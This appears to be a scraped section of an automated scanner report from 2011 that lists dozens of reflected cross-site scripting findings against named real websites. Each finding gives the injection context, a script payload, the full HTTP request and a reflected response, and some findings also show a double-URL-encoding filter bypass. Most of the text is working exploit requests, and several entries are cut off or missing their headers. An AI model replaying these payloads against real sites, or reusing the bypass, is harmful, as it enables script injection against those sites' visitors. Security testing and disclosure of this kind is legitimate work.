HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 20:01:39 GMT Server: Apache Set-Cookie: JSESSIONID=221E9E2F37F1C69B9C1B514DC0D5A781.transportation-app2; Path=/ Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Length: 33087
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1.604. http://www.masstransitmag.com/online/article.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.masstransitmag.com
Path:
/online/article.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfd6b"><script>alert(1)</script>821e7ca1b2a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /online/article.jsp?dfd6b"><script>alert(1)</script>821e7ca1b2a=1 HTTP/1.1 Host: www.masstransitmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 20:01:32 GMT Server: Apache Set-Cookie: JSESSIONID=81465FFF8B03042263701984466159E1.transportation-app1; Path=/ Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Length: 32850
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1.605. http://www.masstransitmag.com/online/article.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.masstransitmag.com
Path:
/online/article.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 68ff2--><script>alert(1)</script>738b17f48c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /online/article.jsp?68ff2--><script>alert(1)</script>738b17f48c8=1 HTTP/1.1 Host: www.masstransitmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 20:01:33 GMT Server: Apache Set-Cookie: JSESSIONID=F1E985808F858E067A374427EFB5F498.transportation-app2; Path=/ Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Length: 32854
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb='http:/ ...[SNIP]... <a href='http://twitter.com/share' rel='nofollow' class='twitter-share-button' expr:data-url='www.masstransitmag.com/online/article.jsp?68ff2--><script>alert(1)</script>738b17f48c8=1' expr:data-text='data:post.title' data-related='bloggerplugins:Tutorials and Widgets for Blogger' data-count='vertical' data-via='' data-lang='en'> ...[SNIP]...
The value of the siteSection request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f13b"><script>alert(1)</script>e5ddb9461e8 was submitted in the siteSection parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /online/article.jsp?siteSection=35f13b"><script>alert(1)</script>e5ddb9461e8&id=13584&pageNum=1 HTTP/1.1 Host: www.masstransitmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 20:01:37 GMT Server: Apache Set-Cookie: JSESSIONID=156E7AA6F7BDF72684787B35490E2E05.transportation-app1; Path=/ Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Length: 35169
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the siteSection request parameter is copied into an HTML comment. The payload 44e9e--><script>alert(1)</script>e99cacb7368 was submitted in the siteSection parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /online/article.jsp?siteSection=344e9e--><script>alert(1)</script>e99cacb7368&id=13584&pageNum=1 HTTP/1.1 Host: www.masstransitmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 20:01:38 GMT Server: Apache Set-Cookie: JSESSIONID=632651F33C0F0C26E4A8060DEB153B2C.transportation-app2; Path=/ Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Length: 35170
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb='http:/ ...[SNIP]... <a href='http://twitter.com/share' rel='nofollow' class='twitter-share-button' expr:data-url='www.masstransitmag.com/online/article.jsp?siteSection=344e9e--><script>alert(1)</script>e99cacb7368&id=13584&pageNum=1' expr:data-text='data:post.title' data-related='bloggerplugins:Tutorials and Widgets for Blogger' data-count='vertical' data-via='' data-lang='en'> ...[SNIP]...
The value of the 9ae29%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb6018bd2558 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ecd31"><script>alert(1)</script>6d456b2243d was submitted in the 9ae29%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb6018bd2558 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?9ae29%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb6018bd2558=1ecd31"><script>alert(1)</script>6d456b2243d HTTP/1.1 Host: www.mydaily.com Proxy-Connection: keep-alive Referer: http://www.mydaily.com/?9ae29%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb6018bd2558=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" class="Geck ...[SNIP]... <link rel="canonical" href="http://www.mydaily.com/?9ae29%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb6018bd2558=1ecd31"><script>alert(1)</script>6d456b2243d" /> ...[SNIP]...
1.609. http://www.mydaily.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.mydaily.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ae29"><script>alert(1)</script>b6018bd2558 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?9ae29"><script>alert(1)</script>b6018bd2558=1 HTTP/1.1 Host: www.mydaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the a request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75db3"><script>alert(1)</script>f24860aff9d was submitted in the a parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.php?a=mydaily-ajax75db3"><script>alert(1)</script>f24860aff9d&xmlurl=http://www.mydaily.com/dl-news/rss.xml&tab_text=NEWS%20&%20CULTURE&clickcount=1 HTTP/1.1 Host: www.mydaily.com Proxy-Connection: keep-alive Referer: http://www.mydaily.com/?9ae29%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb6018bd2558=1 X-Requested-With: XMLHttpRequest Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7c53c'%3b49c0897d1ab was submitted in the REST URL parameter 1. This input was echoed as 7c53c';49c0897d1ab in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /subscribe.aspx7c53c'%3b49c0897d1ab?url=__FEED__ HTTP/1.1 Host: www.pageflakes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 06 Feb 2011 20:18:24 GMT Server: Microsoft-IIS/6.0 From: web11 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: t=; path=/ Set-Cookie: .PAGEFLAKESANON=9B7547FB6F6417F6762368576A206BF25BDED6CB1C6AC19E60765DC0CBB0D504271B8944C0BA37F298127BA102CADE9C72DCFA522B9B6F5D1DE9EC214FFB7E2551D4FD37E98101F05FEAA60C92CF07FC5BFCD9402674BF877CD8044EAEBFF097CEAD8C9FFC6CE64BAC21BD7C010A80BD85BED3DB3C954B41AEAFF5D26F4D3183981B1D4437FEF6ED28DF55DA85BB1D7E4BCA1852CDF3D6E6A1186675A6F328E8; path=/ Cache-Control: no-cache, no-store Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 14411
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9594'-alert(1)-'7d27a31fdb6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /subscribe.aspxb9594'-alert(1)-'7d27a31fdb6 HTTP/1.1 Host: www.pageflakes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 06 Feb 2011 20:18:25 GMT Server: Microsoft-IIS/6.0 From: web11 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: t=; path=/ Set-Cookie: .PAGEFLAKESANON=00C1BACD34145A228C17801CF4E16FBF091C9421789B7ED48B47641BB722DF4B7892848E4981C0856CC10E256EF874A54B3587C0B3881312F4E08965BB83F0A785FD5C2B7B21DEE778AF2BCBC2454BE4667DF4911188191A03F059A9C84B00F7CBD8EAB494795CF0FAB22D303E823190E6952BA20FFA4FC59EA166F4794938214D9BE286A4A65F7A469C920331B7B6A89D4ECD434451E32F7362F3E1422D7C5E; path=/ Cache-Control: no-cache, no-store Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 14376
1.613. http://www.pageflakes.com/subscribe.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.pageflakes.com
Path:
/subscribe.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload af7d9</script><script>alert(1)</script>e03da02d0a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /subscribe.aspx?af7d9</script><script>alert(1)</script>e03da02d0a5=1 HTTP/1.1 Host: www.pageflakes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the url request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 27fe0</script><script>alert(1)</script>69d8ec74b9a was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /subscribe.aspx?url=__FEED__27fe0</script><script>alert(1)</script>69d8ec74b9a HTTP/1.1 Host: www.pageflakes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 06 Feb 2011 20:18:20 GMT Server: Microsoft-IIS/6.0 From: web11 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: t=; path=/ Set-Cookie: .PAGEFLAKESANON=2D8C51FE87E25F2EF1C918D6B63CF9D675325614864C923CFB0E64D67A490255F05F2E5BC450692E60090ACE864409D6F5D06BA5DF0B4F6AD1035BD58179A1AE3D0EDB690C98CF3E006C3AA14AD9050C8930C8094CB6D9177C5AB3B04C5B694965FBBC8F6F4A2D9EDC697CDC6F007D8F2FD75E4A7EBC6C9501723C5BE169C7847BCF7E0506253843B4E47F2AAB4861E75504AC1ADC133DB605D262C54574D59E; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 996
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head><title> Add feed ...[SNIP]... errer; } else { //I clicked the "add to pageflakes link". Please add this feed in my pageflakes page var redirectUrl = 'subscribe2.aspx?url=__FEED__27fe0</script><script>alert(1)</script>69d8ec74b9a'; document.location.href="#marker"; document.location.href= redirectUrl; } </script> ...[SNIP]...
1.615. http://www.parentdish.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.parentdish.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3bee"><script>alert(1)</script>92fa7b5cfb0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?b3bee"><script>alert(1)</script>92fa7b5cfb0=1 HTTP/1.1 Host: www.parentdish.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <link rel="canonical" href="http://www.parentdish.com/?b3bee"><script>alert(1)</script>92fa7b5cfb0=1" /> ...[SNIP]...
1.616. http://www.pawnation.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.pawnation.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9b1c"><script>alert(1)</script>496daf65c5b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?e9b1c"><script>alert(1)</script>496daf65c5b=1 HTTP/1.1 Host: www.pawnation.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into an HTML comment. The payload ab9ad--><script>alert(1)</script>504317df6ad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /newsab9ad--><script>alert(1)</script>504317df6ad/2011-02-lab-on-a-chip-technology-accuracy-lab-results.html HTTP/1.1 Host: www.physorg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 06 Feb 2011 20:01:40 GMT Server: Apache/2.2.3 (CentOS) Connection: close Content-Type: text/html; charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>404 Error ...[SNIP]... </strong>link: /newsab9ad--><script>alert(1)</script>504317df6ad/2011-02-lab-on-a-chip-technology-accuracy-lab-results.html from </p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fe04"><script>alert(1)</script>b1c8bc9f93a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news8fe04"><script>alert(1)</script>b1c8bc9f93a/2011-02-lab-on-a-chip-technology-accuracy-lab-results.html HTTP/1.1 Host: www.physorg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 06 Feb 2011 20:01:39 GMT Server: Apache/2.2.3 (CentOS) Connection: close Content-Type: text/html; charset=ISO-8859-1
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 965c3"-alert(1)-"7fd2404c518 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news965c3"-alert(1)-"7fd2404c518/2011-02-lab-on-a-chip-technology-accuracy-lab-results.html HTTP/1.1 Host: www.physorg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 06 Feb 2011 20:01:40 GMT Server: Apache/2.2.3 (CentOS) Connection: close Content-Type: text/html; charset=ISO-8859-1
1.620. http://www.politicsdaily.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.politicsdaily.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb646"-alert(1)-"c970a7d0009 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?cb646"-alert(1)-"c970a7d0009=1 HTTP/1.1 Host: www.politicsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
var s_code=s_265.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
1.621. http://www.politicsdaily.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.politicsdaily.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12b75"><script>alert(1)</script>4f92425601e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?12b75"><script>alert(1)</script>4f92425601e=1 HTTP/1.1 Host: www.politicsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Politics News, Elec ...[SNIP]... <link rel="canonical" href="http://www.politicsdaily.com/?12b75"><script>alert(1)</script>4f92425601e=1"/> ...[SNIP]...
1.622. http://www.popeater.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.popeater.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e6b4"-alert(1)-"7668b18d7c7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?8e6b4"-alert(1)-"7668b18d7c7=1 HTTP/1.1 Host: www.popeater.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.623. http://www.shelterpop.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shelterpop.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8bed"><script>alert(1)</script>427cdd79cfd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?e8bed"><script>alert(1)</script>427cdd79cfd=1 HTTP/1.1 Host: www.shelterpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 728aa"><a>fbe6569a59a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /category/famous-homes728aa"><a>fbe6569a59a/ HTTP/1.1 Host: www.shelterpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36eee%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e85a90e980ac was submitted in the REST URL parameter 2. This input was echoed as 36eee</script><script>alert(1)</script>85a90e980ac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /category/famous-homes36eee%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e85a90e980ac/ HTTP/1.1 Host: www.shelterpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.626. http://www.shelterpop.com/category/famous-homes/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shelterpop.com
Path:
/category/famous-homes/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e9ef"><script>alert(1)</script>a474d1bac20 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/famous-homes/?2e9ef"><script>alert(1)</script>a474d1bac20=1 HTTP/1.1 Host: www.shelterpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9fd9%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e60ac0efbba8 was submitted in the REST URL parameter 2. This input was echoed as d9fd9</script><script>alert(1)</script>60ac0efbba8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /category/fun-stuffd9fd9%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e60ac0efbba8/ HTTP/1.1 Host: www.shelterpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c0ad"><a>f19ef0c94bc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /category/fun-stuff4c0ad"><a>f19ef0c94bc/ HTTP/1.1 Host: www.shelterpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og=" ...[SNIP]... <link rel="canonical" href="http://www.shelterpop.com/category/fun-stuff4c0ad"><a>f19ef0c94bc/" /> ...[SNIP]...
1.629. http://www.shelterpop.com/category/fun-stuff/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shelterpop.com
Path:
/category/fun-stuff/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 813a1"><script>alert(1)</script>f4b4b7353f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/fun-stuff/?813a1"><script>alert(1)</script>f4b4b7353f8=1 HTTP/1.1 Host: www.shelterpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 641ee%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e56f47603e11 was submitted in the REST URL parameter 2. This input was echoed as 641ee</script><script>alert(1)</script>56f47603e11 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /category/gardening641ee%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e56f47603e11/ HTTP/1.1 Host: www.shelterpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
